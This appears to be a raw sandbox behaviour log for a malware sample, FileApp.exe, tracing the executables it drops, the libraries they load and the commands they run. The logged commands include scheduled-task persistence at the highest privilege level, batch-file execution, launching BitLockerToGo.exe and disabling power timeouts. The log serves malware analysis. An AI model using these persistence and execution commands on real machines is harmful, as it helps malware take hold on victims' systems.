Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\FileApp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegAsm.exe Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: FileApp.exe ReversingLabs: Detection: 23%
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\FileApp.exe "C:\Users\user\Desktop\FileApp.exe"
Source: C:\Users\user\Desktop\FileApp.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe"
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\FileApp.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: winmm.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: wininet.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: winhttp.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: winnsi.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: amsi.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: msasn1.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: gpapi.dll
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Section loaded: powrprof.dll
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Section loaded: umpdc.dll
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: powrprof.dll
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: umpdc.dll
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: pdh.dll
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: shfolder.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: version.dll
